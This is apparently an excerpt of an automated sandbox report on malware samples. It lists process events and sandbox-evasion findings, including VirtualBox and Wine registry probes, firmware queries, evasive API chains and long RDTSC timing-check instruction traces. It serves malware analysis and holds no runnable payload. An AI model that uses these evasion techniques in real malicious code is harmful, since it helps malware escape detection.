                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Source: C:\Windows\SysWOW64\svchost.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-9742
                            Source: C:\Users\user\Desktop\random.exe_Y.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-10046
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSystem information queried: FirmwareTableInformation
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeAPI/Special instruction interceptor: Address: 7FFDB442D044
                            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D044
                            Source: C:\Users\user\Desktop\random.exe_Y.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000002.2843535504.000000000068C000.00000004.00000001.01000000.0000000E.sdmp, d7691cd336.exe, 00000024.00000002.2848451278.0000000004810000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000002.2843535504.000000000068C000.00000004.00000001.01000000.0000000E.sdmp, d7691cd336.exe, 00000024.00000002.2848451278.0000000004810000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2858A8 second address: 2858AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2858AE second address: 2858B8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3458CA5146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2858B8 second address: 2858BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 285E3D second address: 285E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 285E43 second address: 285E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3458756CADh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 285E59 second address: 285E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 287FF6 second address: 287FFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 287FFA second address: 288000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 288000 second address: 28801D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3458756CABh 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 28801D second address: 288021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 288021 second address: 288027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 288027 second address: 288090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F3458CA5151h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jmp 00007F3458CA5151h 0x00000013 pushad 0x00000014 jmp 00007F3458CA514Bh 0x00000019 js 00007F3458CA5146h 0x0000001f popad 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 pushad 0x00000027 push edx 0x00000028 pop edx 0x00000029 jc 00007F3458CA5146h 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F3458CA5159h 0x00000037 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2880C2 second address: 2880C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2880C6 second address: 288168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3458CA5150h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D2E44h] 0x00000015 push 00000000h 0x00000017 push 15E535CAh 0x0000001c push edx 0x0000001d jp 00007F3458CA514Ch 0x00000023 pop edx 0x00000024 xor dword ptr [esp], 15E5354Ah 0x0000002b mov edx, dword ptr [ebp+122D2E44h] 0x00000031 push 00000003h 0x00000033 movsx edi, si 0x00000036 push 00000000h 0x00000038 mov edx, dword ptr [ebp+122D2B88h] 0x0000003e push 00000003h 0x00000040 mov dx, 98A9h 0x00000044 push A00375D4h 0x00000049 push edi 0x0000004a jg 00007F3458CA5148h 0x00000050 pop edi 0x00000051 add dword ptr [esp], 1FFC8A2Ch 0x00000058 mov dword ptr [ebp+122D3222h], ebx 0x0000005e lea ebx, dword ptr [ebp+1244CF43h] 0x00000064 call 00007F3458CA514Bh 0x00000069 mov dword ptr [ebp+122D1C6Fh], ecx 0x0000006f pop ecx 0x00000070 xchg eax, ebx 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F3458CA5156h 0x00000078 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 288168 second address: 288179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458756CADh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 288179 second address: 288198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5153h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 288198 second address: 28819C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 288204 second address: 288208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 288208 second address: 28820E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2882DB second address: 288330 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5150h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jmp 00007F3458CA5150h 0x00000014 jg 00007F3458CA5148h 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d pushad 0x0000001e push edx 0x0000001f jmp 00007F3458CA5159h 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 288330 second address: 288341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 288341 second address: 28834B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F3458CA5146h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 28834B second address: 28834F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 28834F second address: 28837A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jns 00007F3458CA514Bh 0x0000000f lea ebx, dword ptr [ebp+1244CF4Ch] 0x00000015 mov dword ptr [ebp+122D2B3Dh], esi 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f jnl 00007F3458CA5146h 0x00000025 pop ecx 0x00000026 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 28837A second address: 288380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 288380 second address: 288384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 288384 second address: 288388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 28842D second address: 288444 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 288444 second address: 28844A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 28844A second address: 2884FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnl 00007F3458CA5146h 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jne 00007F3458CA5154h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007F3458CA5152h 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 jmp 00007F3458CA5150h 0x0000002a pop eax 0x0000002b mov dword ptr [ebp+122D2250h], ebx 0x00000031 push 00000003h 0x00000033 or dword ptr [ebp+122D2327h], ebx 0x00000039 push 00000000h 0x0000003b push 00000003h 0x0000003d jmp 00007F3458CA5158h 0x00000042 push 8D21A73Fh 0x00000047 pushad 0x00000048 push edx 0x00000049 jo 00007F3458CA5146h 0x0000004f pop edx 0x00000050 jmp 00007F3458CA514Ah 0x00000055 popad 0x00000056 xor dword ptr [esp], 4D21A73Fh 0x0000005d sub ecx, 1292D7E1h 0x00000063 lea ebx, dword ptr [ebp+1244CF57h] 0x00000069 mov edx, dword ptr [ebp+122D2C38h] 0x0000006f xchg eax, ebx 0x00000070 pushad 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2884FC second address: 288502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 29AA7A second address: 29AA9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F3458CA5146h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F3458CA514Ch 0x0000001c popad 0x0000001d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A777D second address: 2A7781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A7E6E second address: 2A7E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A7E72 second address: 2A7E82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F3458756CA6h 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A7E82 second address: 2A7E92 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F3458CA514Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A8295 second address: 2A8299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A8299 second address: 2A829F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 29FBCF second address: 29FBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A8980 second address: 2A89AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3458CA5155h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F3458CA5146h 0x00000014 jnl 00007F3458CA5146h 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A909D second address: 2A90A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A90A1 second address: 2A90AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A920E second address: 2A9212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A9212 second address: 2A921E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A921E second address: 2A9222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A93AC second address: 2A93B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A9630 second address: 2A963F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2AC362 second address: 2AC366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2AC366 second address: 2AC36A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2AC36A second address: 2AC375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2AC96D second address: 2AC9D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F3458756CBBh 0x00000010 js 00007F3458756CB5h 0x00000016 jmp 00007F3458756CAFh 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F3458756CB4h 0x00000024 mov eax, dword ptr [eax] 0x00000026 pushad 0x00000027 jmp 00007F3458756CABh 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F3458756CACh 0x00000033 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2AC9D5 second address: 2AC9F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F3458CA514Fh 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2AC9F5 second address: 2AC9FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2AC9FB second address: 2AC9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2ACAFD second address: 2ACB59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3458756CB4h 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F3458756CB4h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F3458756CB0h 0x00000021 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2ACB59 second address: 2ACB64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F3458CA5146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B3AE2 second address: 2B3AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007F3458756CA8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B3AEF second address: 2B3AF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B3C4B second address: 2B3C61 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3458756CAEh 0x00000008 jc 00007F3458756CA6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B3C61 second address: 2B3C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B42BD second address: 2B42C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B42C1 second address: 2B42C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
